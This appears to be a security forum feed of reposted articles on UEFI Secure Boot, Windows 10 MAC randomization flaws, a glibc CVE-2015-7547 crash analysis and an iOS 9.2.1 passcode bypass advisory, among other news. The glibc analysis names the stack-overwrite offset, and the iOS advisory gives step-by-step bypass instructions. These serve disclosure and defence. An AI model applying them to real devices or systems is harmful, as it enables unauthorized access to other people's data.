Nytro

Cautam Junior Pentester(s). Daca cineva e interesat, astept un PM. Requirements: - Passion.

Senzorul de amprentă de pe telefoane poate fi păcălit cu o foaie de hârtie Blocarea smartphone-ului personal cu ajutorul unui senzor biometric este una dintre cele mai sigure metode de securitate pentru astfel de dispozitive. Mulţi au încercat să spargă această protecţie folosind diverse metode costisitoare, însă până în prezent imprimarea amprentei pe o foaie de hârtie nu a avut prea mult succes. Se pare însă că ideea era bună, însă echipamentul nu era destul de performant pentru a realiza o amprentă falsă. Soluţia? O imprimantă care lasă pe hârtie cerneală conductivă. Articol complet si video: http://www.go4it.ro/telefoane-mobile/senzorul-de-amprenta-de-pe-telefoane-poate-fi-pacalit-cu-o-foaie-de-hartie-15100336/

Announcing SQL Server on Linux Posted March 7, 2016 By Scott Guthrie - Executive Vice President, Cloud and Enterprise Group, Microsoft It’s been an incredible year for the data business at Microsoft and an incredible year for data across the industry. This Thursday at our Data Driven event in New York, we will kick off a wave of launch activities for SQL Server 2016 with general availability later this year. This is the most significant release of SQL Server that we have ever done, and brings with it some fantastic new capabilities. SQL Server 2016 delivers: Groundbreaking security encryption capabilities that enable data to always be encrypted at rest, in motion and in-memory to deliver maximum security protection In-memory database support for every workload with performance increases up to 30-100x Incredible Data Warehousing performance with the #1, #2 and #3 TPC-H 10 Terabyte benchmarks for non-clustered performance, and the #1 SAP SD Two-Tier performance benchmark on windows Business Intelligence for every employee on every device – including new mobile BI support for iOS, Android and Windows Phone devices Advanced analytics using our new R support that enables customers to do real-time predictive analytics on both operational and analytic data Unique cloud capabilities that enable customers to deploy hybrid architectures that partition data workloads across on-premises and cloud based systems to save costs and increase agility These improvements, and many more, are all built into SQL Server and bring you not just a new database but a complete platform for data management, business analytics and intelligent apps – one that can be used in a consistent way across both on-premises and the cloud. In fact, over the last year we’ve been using the SQL Server 2016 code-base to run in production more than 1.4 million SQL Databases in the cloud using our Azure SQL Database as a Service offering, and this real-world experience has made SQL Server 2016 an incredibly robust and battle-hardened data platform. Gartner recently named Microsoft as leading the industry in their Magic Quadrant for Operational Database Management Systems in both execution and vision. We’re also a leader in Gartner’s Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics, and Magic Quadrant for Business Intelligence and Analytics Platforms, as well as leading in vision in the Magic Quadrant for Advanced Analytics Platforms. Extending SQL Server to Also Now Run on Linux Today I’m excited to announce our plans to bring SQL Server to Linux as well. This will enable SQL Server to deliver a consistent data platform across Windows Server and Linux, as well as on-premises and cloud. We are bringing the core relational database capabilities to preview today, and are targeting availability in mid-2017. SQL Server on Linux will provide customers with even more flexibility in their data solution. One with mission-critical performance, industry-leading TCO, best-in-class security, and hybrid cloud innovations – like Stretch Database which lets customers access their data on-premises and in the cloud whenever they want at low cost – all built in. “This is an enormously important decision for Microsoft, allowing it to offer its well-known and trusted database to an expanded set of customers”, said Al Gillen, group vice president, enterprise infrastructure, at IDC. “By taking this key product to Linux Microsoft is proving its commitment to being a cross platform solution provider. This gives customers choice and reduces the concerns for lock-in. We would expect this will also accelerate the overall adoption of SQL Server.” “SQL Server’s proven enterprise experience and capabilities offer a valuable asset to enterprise Linux customers around the world,” said Paul Cormier, President, Products and Technologies, Red Hat. “We believe our customers will welcome this news and are happy to see Microsoft further increasing its investment in Linux. As we build upon our deep hybrid cloud partnership, spanning not only Linux, but also middleware, and PaaS, we’re excited to now extend that collaboration to SQL Server on Red Hat Enterprise Linux, bringing enterprise customers increased database choice.” “We are delighted to be working with Microsoft as it brings SQL Server to Linux,” said Mark Shuttleworth, founder of Canonical. “Customers are already taking advantage of Azure Data Lake services on Ubuntu, and now developers will be able to build modern applications that utilize SQL Server’s enterprise capabilities.” Bringing SQL Server to Linux is another way we are making our products and new innovations more accessible to a broader set of users and meeting them where they are. Just last week, we announced our agreement to acquire Xamarin. Recently, we alsoannounced Microsoft R Server , our technologies based on our acquisition of Revolution Analytics, with support for Hadoop and Teradata. The private preview of SQL Server on Linux is available starting today and we look forward to working with the community, our customers and our partners to bring it to market. Please join me Satya Nadella, Joseph Sirosh and Judson Althoff at our Data Driven event on Thursday to hear more about this news and how Microsoft is helping customers transform their business using data. Thanks, Scott Sursa: https://blogs.microsoft.com/blog/2016/03/07/announcing-sql-server-on-linux/

Exploiting Adobe Flash Player In The Era Of Control Flow Guard

AN INTRODUCTION OF UEFI SECURE BOOT AND DISK PARTITIONS IN WINDOWS 10 As a firmware interface standard to replace BIOS (Basic Input/Output System), UEFI (Unified Extensible Firmware Interface) specification has been a collective effort byUEFI Forum members for a while. UEFI is in essence an abstraction layer between firmware and OS, and independent of device hardware and architecture. Which provides flexibility for supporting multiple and various OS environments and as well acts as a generic target boot environment of drivers for cross-platform compatibility, as opposed to the need to develop a particular driver for particular hardware. With UEFI, there are also security opportunities to better defend a class of malware like bootkit and rootkit targeting the pre-boot environment of a device. Why UEFI Secure Boot Specifically, UEFI Secure Boot is an option to prevent a device from being tampered in a pre-boot environment, i.e. the period from power-on to initializing the OS. Malware injects itself in firmware or ROM, gains hardware access and is loaded before the OS, etc. make it difficult to defend or clean up, once a device is compromised. The Secure Boot option performs signature authentication upon executing code during pre-boot. A code/firmware creator is in this case required to digitally sign one’s code with a private key and to be verified against the paired public key upon loading at a device startup. Apparently, this process demands a signature database of supported hardware vendors established beforehand. Which explains why Microsoft, in fact since Windows 8, has instituted a driver signing process for certifying digital signatures of firmware for implementing UEFI Secure Boot and there are some changes of the process in Windows 10. Above all, UEFI Secure Boot specification addresses security issues relevant to boot time exploits and eliminates the possibility for executing untrusted or altered code during pre-boot. And Windows 10 Enterprise supports UEFI 2.3.1 and later forDevice Guard, a new and key security feature of Windows 10 Enterprise to ensure hardware and OS boot integrity of corporate devices. The following compares the security features of Windows 10 editions. Additional information of comparing Windows 10 editions based on Core Experience and Business Experience is readily available. Sample Disk Layouts One easy way for an end user to verify if a device is UEFI-based is to examine the disk layout. Typically a BIOS-based device has two partitions, system and OS, on a primary disk where the OS is installed. A device based on UEFI has a vividly different disk layout from that of BIOS. The following details. The following are sample disk layouts of Windows 10 devices based on BIOS and UEFI as reported by Disk Manager and DISKPART command line utility. Then BIOS This is a sample BIOS setup screen of a Windows device. And this is a typical disk layout of a device with BIOS, with System and an OS partitions, as reported by Windows desktop Disk Manager. A DISKPART session as demonstrated below shows a disk layout consistent with what is reported by Disk Manager, with two partitions accordingly. Now with UEFI For UEFI, the following are two sample disk layouts. Notice that either one has an EFI System Partition, i.e. ESP. However, a DISKPART session reveals that there is actually an extra partition, the so-called Microsoft Reserved Partition, or MSR,which is: With no partition ID and not reported by Disk Manager Not for storing any user data Reserved for drive management of the local hard disk The sizes of ESP and MSR are customizable. And based on business needs, additional partitions are to be added. Those involved in OS imaging and enterprise device deployment are encouraged to review and get familiar with the specifics of and Microsoft’s recommendations on configuring UEFI/GPT-based hard drive partitions, as detailed elsewhere. Sample 1, A Typical Disk Layout with UEFI This is based on a Surface Pro 4 machine purchased from a retail store running Windows 10 Pro Build 10586, as shown. Disk Manager shows a three-partition disk with an ESP of 100 MB in size. On the same device, a DISKPART session reveals that the disk also has a 16-MB MSR as Partition 3. Sample 2, A Custom Disk Layout with UEFI Below is a sample company-issued Surface Pro 3 device running Windows 10 Enterprise Insider Preview Build 11082. Here, Disk Manager presents a custom image with four partitions including a 350 MB ESP and a recovery partition after the OS partition. And again, a DISKPART session reveals an 128 MB MSR as Partition 3. UEFI and GPT One thing worth point out is that when deploying Windows to an UEFI-based PC, one must format the hard drive that includes the Windows partition as a GUID Partition Table (GPT) file system. Additional drives may then use either the GPT or Master Boot Record (MBR) file format. Manually Enabling Secure Boot With UEFI already configured, here are manually ways to enable/configure secure boot with a Windows 10 device. A Hardware Short-Cut with Surface Pro devices There is a convenient way via hardware to change the boot settings of a Microsoft Surface Pro device. While the machine is power off, pressing the power button and the volume up button at the same time for a few (generally 5 to 10, some may take 20 or more) seconds will bring up the device boot setting screen. And if keeping holding the power and volume up buttons passing the boot setup screen for another few seconds, eventually this will trigger reloading the firmware in my experience. Here is the boot setup screen from the above mentioned Surface Pro 4 device running Windows 10 Pro, purchased from a retail store. and with the secure boot options: On the other hand, the following is a boot setup screen from a sample company-issued Surface Pro 3 device with a custom image built deployed with System Center Configuration Manager. The UI may appear different, and the available settings are most the same. Changing UEFI or Boot Settings via UI For a Windows 10 device based on UEFI, here is a visual presentation for demonstrating how to manually enable UEFI Secure Boot on Surface Pro 3 device running Windows 10 Enterprise Insider Preview Build 11082. The process begins by clicking Start/Settings from the desktop. Upon the first restart, click the following screens as indicated. And the second restart should bring up the boot setup screen shown earlier in this article. And again as mentioned, the process via UI can be short-cut by pressing the power and the volume up button at the same time for a few seconds, while a Surface Pro device is powered off. Closing Thoughts With on-going malware threats and a growing trend in adopting BYOD, IT must recognize the urgency to fundamentally secure corporate devices from power on to off. UEFI Secure Boot is an industry standard and a mechanism to ensure hardware integrity every time and all the time. There are specific hardware requirements and configurations must be first put in place for solutions relying on UEFI Secure Boot like Device Guard for Windows 10 Enterprise. Therefore, rolling out UEFI 2.3.1 or later and TPM 2.0 as well are important hardware components for IT to leverage hardware-based security features to fundamentally secure corporate devices. Sursa: https://yungchou.wordpress.com/2016/03/04/an-introduction-of-uefi-secure-boot-in-windows-10-enterprise/

How MAC Address Randomization Works on Windows 10 When Apple announced its devices would use random MAC addresses when searching for Wi-Fi networks, it received extensive media attention. And rightly so. It prevents companies from tracking your movements, and Apple was the first major player to start doing this. Windows and Android are quietly trying to catch up. As a result, some devices running Windows now support MAC address randomization, and we will discuss how it's implemented, and where it fails. This information is a small selection from the recent paper Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms. How it works Microsoft first added support for MAC address randomization in Windows 10. Unfortunately, it's only available if you have a WiFi card and driver that support it. For example, the Intel 7265 AC, when using the latest driver, supports randomization [1]. You can see if your hardware supports MAC address randomization by going through the following menus: If your hardware supports MAC address randomization, you will see the following option at the top of the window: As you can see, I have it enabled on my laptop. So far it's been working quite well. What's very interesting about Microsoft's approach is that it also uses random MAC addresses when connecting to a wireless networks. In contrast, Apple only uses random addresses when searching for nearby networks, and it falls back to its original address when connecting to a network. In this aspect Windows 10 offers better privacy than Apple. Using a random MAC address to connect to a network can cause problems if users are authenticated (i.e., recognized) based on their MAC address [2]. Interestingly, Windows avoids this issue by always using the same random address every time it connect to a specific network. For example, let's say you want to pay for Wi-Fi access, and they authenticate you based on your MAC address. Then this is not a problem. The first time you connect, Windows will generate a random MAC address. And if you reconnect to this network at a later point in time, Windows will reuse the previously generated address. Therefore the system can still recognize you, and you don't have to pay twice. There's one downside to this approach: since you always use the same address when connecting to a particular network, an adversary can learn when certain devices connect to specific networks. Nevertheless, compared to the old situation where you'd always use the original MAC address, it improves your privacy. Technically, the random MAC address that is used to connect to a network is calculated as [5]: address = SHA-256(SSID, real MAC address, connectionId, secret)[:6] Here SSID is the name of the network you are connecting to, real MAC address the original address of your network interface, and connectionId is a value that changes every time the user removes (and re-adds) the network (i.e., this value is updated if you "forget" the network under Windows 10). The secretparameter is a 256-bit cryptographic random number, generated during system initialization, and kept the same across reboots. Every interface has a different value of the secret parameter, to assure each interface gets different random MAC address. Finally, bits in the most significant byte of address are set so it becomes a locally administered, unicast address. While the presentation by Huitema partly described this process, our paper is the first to describe this formula in full detail. It's also possible to disable randomization for certain networks. In this case Windows will use the original address when connecting to a network. You can configure this through the following settings when you are currently connected to the network: Notice that the user has three options for each specific network: On: the same random MAC address is always used when connecting to this network. Off: the original MAC address is used. Change daily: every day a new random MAC address is used. Remark that if randomization is enabled, independent of the above options, Windows 10 will always use random MAC addresses when scanning for nearby networks. This "scanning" address changes every time you connect (and disconnect) from a network, and when you restart your device [3]. Hence it doesn't change that frequently, but it's still sufficient to prevent tracking over extended periods of time. In contrast, Apple changes the scanning address roughly every few minutes, which provides more privacy. Basic Security Analysis Randomization as implemented in Windows 10 significantly improves your privacy. So enable it!Unfortunately, it's not perfect, because there are still some ways to defeat or bypass it. The first weakness is that the sequence number contained in WiFi frames is not reset when changing the (random) MAC address. This sequence number, which is present in most Wi-Fi frames, is used to detected retransmissions, and is incremented by one after successfully transmitting a frame. As shown in the picture below, when the MAC address changes because the user connects to a network, the sequence counter is not reset: The last frame from ea:69:0a:* has the sequence number of 92, and the other address 7c:5c:f8:* has the sequence number 94. Based on this an adversary can reasonably conclude that both frames are sent by the same device. In other words, he learns that the same device was using both addresses, defeating the purpose of address randomization. The second problem is that Windows 10 reveals its real MAC address when interacting with Hotspot 2.0 networks. But what's Hotspot 2.0? Simply put, Hotspot 2.0 is a new standard to automatically and securely roam between WiFi networks. No manual interaction is needed. Your device automatically determines whether you have the appropriate credentials (passwords) to connect to a network. Think of this like the cellular network: when you get off the plane, you phone automatically finds and connects to a foreign cellular networks. Hotspot 2.0 provides a similar experience for WiFi. In order to accomplish automatic roaming, Hotspot 2.0 sends ANQP queries to the Access Point before connecting to it. These ANQP queries request detailed information about the wireless network. This information includes the credentials that are needed to connect with the hotspot, whether the hotspot provides internet access or only local network access, etc. Unfortunately, Windows 10 sends these ANQP queries using the real (original) MAC address: In the first probe request it uses the random MAC address 2a:b3:e6:*. These probe requests are used to detect the presence of networks. If there's a Hotspot 2.0 network nearby, Windows will send ANQP requests using the real MAC address, in this case 7c:5c:f8:*. Therefore an attacker can obtain your real MAC address by advertising a Hotspot 2.0 network. Thankfully, Windows 10 only sends ANQP queries if at least one Hotspot 2.0 is configured. Since this is standard is not yet widely deployed, few users will have such a network configured [4]. Detailed Security Analysis Want to know all flaws that are present in existing implementations of MAC address randomization? And this specifically for Android, Apple, Linux, and Windows? Then read my paper Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms [5]! It has everything explained in technical detail. References and Footnotes [1] If you have an Intel 7260 AC, you can also force Windows 10 to use the drivers of the Intel 7265 AC. Your device will still work, and will support MAC address randomization. [2] Even though authentication based on the MAC address is utterly insecure (an adversary can easily spoof a MAC address), it's still used by many systems. [3] C. Huitema. Personal communication, Nov. 2015. [4] One notable exception is the Passpoint configuration provided by Boingo. Essentially Passpoint is a synonym of Hotspot 2.0. If you have this configuration installed, you have a Hotspot 2.0 capable device, and the Boingo configuration will use Hotspot 2.0. This means Windows will send ANQP queries to nearby Hotspot 2.0 networks. [5] M. Vanhoef, C. Matte, M. Cunche, L. S. Cardoso, and F. Piessens. Why MAC Address Randomization is not Enough: An Analysis of Wi-Fi Network Discovery Mechanisms (AsiaCCS 2016). Geplaatst door Mathy op 20:21 Sursa: http://www.mathyvanhoef.com/2016/03/how-mac-address-randomization-works-on.html

CVE 2015-7547 glibc getaddrinfo() DNS Vulnerability Posted by jstester007 on March 7th, 2016 Hello w0rld! JUMPSEC researchers have spent some time on the glibc DNS vulnerability indexed as CVE 2015-7547 (It hasn’t got a cool name like GHOST unfortunately…). It appears to be a highly critical vulnerability and covers a large number of systems. It allows remote code execution by a stack-based overflow in the client side DNS resolver. In this post we would like to present our analysis. Google POC overview Google POC Network Exploitation Timeline Google POC Exploit Code Analysis First response Code snippet Packet capture snippet The dw() function calls a “struct” module from python library. According to the documentation, it performs conversion between python values and C structs represented as python strings. In this case, it interprets python integer and pack it into little-endian short type binary data. This is a valid response sent by the “malicious” DNS server when it receives any initial queries. This response packet is constructed intentionally in large size (with 2500 bytes of null), it forces the client to retry over TCP and allocate additional memory buffer for the next response. This also triggers the dual DNS query from getaddrinfo() on the client side, which is a single request containing A and AAAA queries concatnated. Second Response Code snippet Packet capture snippet This is the second response sent by the malicious DNS server. It is a malformed packet sending large numbers of “fake records” (184 Answer RRs) back to the client. According to google, this forces __libc_res_nsend to retry the query. Third response Code snippet Packet capture snippet This is the third response sent by the “malicious” DNS server. It is another malformed packet which is carrying the payload. JUMPSEC researcher has modified the Google POC code to identify the the number of bytes to cause a segmentation fault (possibly overwriting the RET address) of the buffer. It is found that the RET address is being overwritten on the 2079thbyte. With the addition of return_to_libc technique, an attacker can bypass OS protection such as NX bit or ASLR and perform remote code execution. Google POC debugging and crash analysis JUMPSEC has run it through the trusty gdb. It crashes with a SEGMENTATION FAULT which verifies that the DNS response has smashed the stack of the vulnerable client application when running getaddrinfo(). The vulnerable buffer is operated in gaih_getanswer. The entry address has been overwritten with 0x4443424144434241 (ABCDABCD). The state of the register also showing the overflowed bytes. SEGFAULT from vulnerable client. RET address is overwritten with “ABCDABCD” Backtrack Registers JUMPSEC has also tested it on a few other applications. It was found that the getaddrinfo() function in glibc is commonly used… Iceweasel crashing Conclusion The best way to mitigate this issue is to enforce proper patching management. Make sure to update all your systems with the latest version of glibc . If you have any systems exposed on the internet and you want to make sure that this vulnerability is not triggered then the following Wireshark filter could be useful: (DNS.length>2048 to see malformed packets). A DNS response has a maximum of 512 bytes (typically), note that the DNS reply is truncated. Even if the client does not accept large response, smaller responses can be combine into a large one which can also trigger the vulnerability. A possible filter is to monitor the size of the entire conversation as a distinct amount of bytes in total is require to trigger specific responses from vulnerable client and all of them requires more than 2048 bytes. The above vulnerability can be fixed by patching. If you are running RedHat or CentOS a simple yum -y update glibc will update the libc and resolve the issue. Reference links https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547 http://pubs.opengroup.org/onlinepubs/9699919799/functions/freeaddrinfo.html https://googleonlinesecurity.blogspot.co.uk/2016/02/cve-2015-7547-glibc-getaddrinfo-stack.html https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html Sursa: https://labs.jumpsec.com/2016/03/07/cve-2015-7547-glibc-getaddrinfo-dns-vulnerability/

Climber Automated auditing tool to check UNIX/Linux systems misconfigurations which may allow local privilege escalation. Dependencies python >= 2.7 python-crypto python-mako python-paramiko Note Climber needs Exscript, a Python module and a template processor for automating network connections over protocols such as Telnet or SSH. https://github.com/knipknap/exscript This module is already included in Climber sources. License This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. Sursa: https://github.com/raffaele-forte/climber

Romanian ATM hacker exploits vulnerability in FENCE, escapes jail Robber clobbered but catching carder is harder 8 Mar 2016 at 05:56, Darren Pauli A Romanian carder arrested for using malware to plunder US$217,000 (£152,164, A$290,888) from ATMs has cut their way out of a Bucharest prison and escaped custody. Renato Marius Tulli, 34, escaped Police Precinct 19 with Grosy Gostel, 38, held for robbery charges, sparking a city-wide hunt, local media report. Gostel has been caught while malware man Tulli remains on the run. The carder and the robber cut a hole in the mesh fence and jumped an outer fence at the police station. Tulli and his gang raided ATMs maintained by NCR across Romania, Hungary, Spain, Russia, and the Czech Republic. They used the Tyupkin malware loading it onto ATMs using a CD slotted into the back of the machines. That malware has been upgraded in recent months and is now known as GreenDispenser and is being used to target ATMs across Mexico. There is little preventing the self-deleting malware from being used in other countries, experts say. ® Sursa: http://www.theregister.co.uk/2016/03/08/romanian_atm_hacker_exploits_vulnerability_in_fence_escapes_jail/

Apple iOS v9.2.1 - Multiple PassCode Bypass Vulnerabilities From: Vulnerability Lab <research () vulnerability-lab com> Date: Mon, 7 Mar 2016 09:52:02 +0100 Document Title: =============== Apple iOS v9.2.1 - Multiple PassCode Bypass Vulnerabilities (App Store Link, Buy Tones Link & Weather Channel Link) References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1778 Video: http://www.vulnerability-lab.com/get_content.php?id=1779 Release Date: ============= 2016-03-07 Vulnerability Laboratory ID (VL-ID): ==================================== 1778 Common Vulnerability Scoring System: ==================================== 6.4 Product & Service Introduction: =============================== iOS (previously iPhone OS) is a mobile operating system developed and distributed by Apple Inc. Originally released in 2007 for the iPhone and iPod Touch, it has been extended to support other Apple devices such as the iPad and Apple TV. Unlike Microsoft`s Windows Phone (Windows CE) and Google`s Android, Apple does not license iOS for installation on non-Apple hardware. As of September 12, 2012, Apple`s App Store contained more than 700,000 iOS applications, which have collectively been downloaded more than 30 billion times. It had a 14.9% share of the smartphone mobile operating system units shipped in the third quarter of 2012, behind only Google`s Android. In June 2012, it accounted for 65% of mobile web data consumption (including use on both the iPod Touch and the iPad). At the half of 2012, there were 410 million devices activated. According to the special media event held by Apple on September 12, 2012, 400 million devices have beensold through June 2012. ( Copy of the Homepage: http://en.wikipedia.org/wiki/IOS ) Apple Inc. is an American multinational technology company headquartered in Cupertino, California, that designs, develops, and sells consumer electronics, computer software, and online services. Its hardware products include the iPhone smartphone, the iPad tablet computer, the Mac personal computer, the iPod portable media player, and the Apple Watch smartwatch. Apple's consumer software includes the OS X and iOS operating systems, the iTunes media player, the Safari web browser, and the iLife and iWork creativity and productivity suites. Its online services include the iTunes Store, the iOS App Store and Mac App Store, and iCloud. (Copy of the Homepage: https://en.wikipedia.org/wiki/Apple_Inc. ) Abstract Advisory Information: ============================== The vulnerability laboratory research team discovered multiple connected passcode protection bypass vulnerabilities in the iOS v9.0, v9.1, v9.2.1 for Apple iPhone (5,5s,6 & 6s) and the iPad (mini,1 & 2). Vulnerability Disclosure Timeline: ================================== 2016-01-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2016-01-04: Vendor Notification (Apple Product Security Team) 2016-**-**: Vendor Response/Feedback (Apple Product Security Team) 2016-**-**: Vendor Fix/Patch (Apple Developer Team) 2016-**-**: Security Acknowledgements (Apple Product Security Team) 2016-03-07: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Apple Product: iOS - (Mobile Operating System) 9.1, 9.2 & 9.2.1 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ An auth passcode bypass vulnerability has been discovered in the iOS v9.0, v9.1, v9.2.1 for Apple iPhone (5,5s,6 & 6s) and the iPad (mini,1 & 2). The vulnerability typ allows an local attacker with physical device access to bypass the passcode protection mechanism of the Apple mobile iOS devices. The vulnerabilities are located in the 'Appstore', 'Buy more Tones' or 'Weather Channel' links of the Clock, Event Calender & Siri User Interface. Local attackers can use siri, the event calender or the available clock module for an internal browser link request to the appstore that is able to bypass the customers passcode or fingerprint protection mechanism. The attacker can exploit the issue on several ways with siri, the events calender or the clock app of the control panel on default settings to gain unauthorized access to the affected Apple mobile iOS devices. 1.1 In the first scenario the attacker requests for example via siri an non existing app, after that siri answers with an appstore link to search for it. Then the attacker opens the link and a restricted browser window is opened and listing some apps. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls is visible in the siri interface only and is called "open App Store". The vulnerability is exploitable in the Apple iPhone 5 & 6(s) with iOS v9.0, v9.1 & v9.2.1 1.2 In the second scenario the attacker is using the control panel to gain access to the non restricted clock app. The local attacker opens the app via siri or via panel and opens then the timer to the end timer or Radar module. The developers of the app grant apple customers to buy more sounds for alerts and implemented a link. By pushing the link a restricted appstore browser window opens. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the Alert - Tone (Wecker - Ton) & Timer (End/Radar) and is called "Buy more Tones". The vulnerability is exploitable in the Apple iPhone 5 & 6(s) with iOS v9.0, v9.1 & v9.2.1. 1.3 In the third scenario the attacker opens via panel or by a siri request the clock app. After that he opens the internal world clock module. In the buttom right is a link to the weather channel that redirects to the store as far as its deactivated. By pushing the link a restricted appstore browser window opens. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the World Clock (Weather Channel) and is an image as link. Thus special case is limited to the iPad because only in that models use to display the web world map. In the iPhone version the bug does not exist because the map is not displayed because of using a limited template. The vulnerability is exploitable in the Apple iPad2 with iOS v9.0, v9.1 & v9.2.1. 1.4 In the fourth scenario the attacker opens via siri the 'App & Event Calender' panel. After that the attacker opens under the Tomorrow task the 'Information of Weather' (Informationen zum Wetter - Weather Channel LLC) link on the left bottom. As far as the weather app is deactivated on the Apple iOS device, a new browser window opens to the appstore. At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the App & Events Calender panel. The vulnerability is exploitable in the Apple Pad2 with iOS v9.0, v9.1 & v9.2.1. The security risk of the passcode bypass vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of the passcode protection mechanism bypass vulnerability requires no privileged ios device user account or low user interaction. Physical apple device access is required for successful exploitation. Successful exploitation of the vulnerability results in unauthorized device access, mobile apple device compromise and leak of sensitive device data like the address-book, photos, sms, mms, emails, phone app, mailbox, phone settings or access to other default/installed mobile apps. Vulnerable Module(s): [+] PassCode (Protection Mechanism) Affected Device(s): [+] iPhone (Models: 5, 5s, 6 & 6s) [+] iPad (Models: mini, 1 & 2) Affected OS Version(s): [+] iOS v9.0, v9.1 & v9.2.1 Proof of Concept (PoC): ======================= The passcode protection mechanism bypass vulnerabilities can be exploited by local attackers with physical device access and without privileged or restricted device user account. For Security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. 1.1 Manual steps to reproduce the vulnerability ... (Siri Interface - App Store Link) iPhone (Models: 5, 5s, 6 & 6s) 1. Take the iOS device and lock the passcode to the front 2. Open Siri by activation via Home button (push 2 seconds) 3. Ask Siri to open a non existing App Note: "Open App Digital (Öffne App Digital) 4. Siri responds to the non existing app and asks to search in the appstore 5. Now, and "open App store" button becomes visible to push (do it!) 6. A new restricted browser window opens with the appstore buttom menu links 7. Click to updates and open the last app or push twice the home button to let the task slide preview appear 8. Now choose the active front screen task 9. Successful reproduce of the passcode protection bypass vulnerability! 1.2 Manual steps to reproduce the vulnerability ... (Clock & Timer - Buy more Tones Link) iPhone (Models: 5, 5s, 6 & 6s) 1. Take the iOS device and lock the passcode to the front 2. Open Siri by activation via Home button (push 2 seconds) Note: "Open World Clock" (Öffne App Weltuhr) 3. Push the 'Timer' module button on the buttom 4. Now, push the Radius or End Timer Button in the middle of the screen Note: A listing opens with the sounds collection and on top is a web link commercial 5. Push the button and a new restricted browser window opens with the appstore buttom menu links 6. Click to updates and open the last app or push twice the home button to let the task slide preview appear 7. Now choose the active front screen task 8. Successful reproduce of the passcode protection bypass vulnerability! Note: The vulnerability can also be exploited by pushing the same link in the Alerts Timer (Wecker) next to adding a new one. 1.3 Manual steps to reproduce the vulnerability ... (Clock World - Weather Channel Image Link) iPad (Models: 1 & 2) 1. Take the iOS device and lock the passcode to the front 2. Open Siri by activation via Home button (push 2 seconds) Note: "Open App Clock" (Öffne App Uhr) 3. Switch in the buttom module menu to world clock Note: on the buttom right is an image of the weather channel llc network 4. Push the image of the weather channel llc company in the world map picture Note: Weather app needs to be deactivated by default 5. After pushing the button and a new restricted browser window opens with the appstore buttom menu links 6. Click to updates and open the last app or push twice the home button to let the task slide preview appear 7. Now choose the active front screen task 8. Successful reproduce of the passcode protection bypass vulnerability! Note: The issue is limited to the iPad 1 & 2 because of the extended map template! 1.4 Manual steps to reproduce the vulnerability ... (Events Calender App - Weather Channel LLC Link) iPad (Models: 1 & 2) & iPhone (Models: 5, 5s, 6 & 6s) 1. Take the iOS device and lock the passcode to the front 2. Open Siri by activation via Home button (push 2 seconds) Note: "Open Events/Calender App" (Öffne Events/Kalender App) 3.Now push on the buttom of the screen next to the Tomorrow(Morgen) module the 'Information of Weather Channel' link Note: Weather app needs to be deactivated by default 4.After pushing the button and a new restricted browser window opens with the appstore buttom menu links 5. Click to updates and open the last app or push twice the home button to let the task slide preview appear 6. Now choose the active front screen task 7. Successful reproduce of the passcode protection bypass vulnerability! Video Demonstration: In the attached video demonstration we show how to bypass the passcode of the iphone 6s via the siri App Store- & timer Buy more Tones link. In the video we activated the passcode and setup to activate the control center by default to the locked mobile front screen. Siri was activated as well by default. Solution - Fix & Patch: ======================= The vulnerabilities can be temporarily patched by the end user by hardening of the device settings. Deactivate in the Settings menu the Siri module permanently. Deactivate also the Events Calender without passcode to disable the push function of the Weather Channel LLC link. Deactivate in the next step the public control panel with the timer and world clock to disarm exploitation. Aktivate the weather app settings to prevent the redirect when the module is disabled by default in the events calender. Finally apple needs to issue a patch as workaround for the issue but since this happens a temp solution has bin published as well. Security Risk: ============== The security risk of the passcode protection mechanism bypass vulnerabilities in the apple ipad and iphone mobile devices are estimated as high. (CVSS 6.4) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (research () vulnerability-lab com) [http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin () vulnerability-lab com - research () vulnerability-lab com - admin () evolution-sec com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research () vulnerability-lab com) to get a ask permission. Copyright © 2016 | Vulnerability Laboratory - 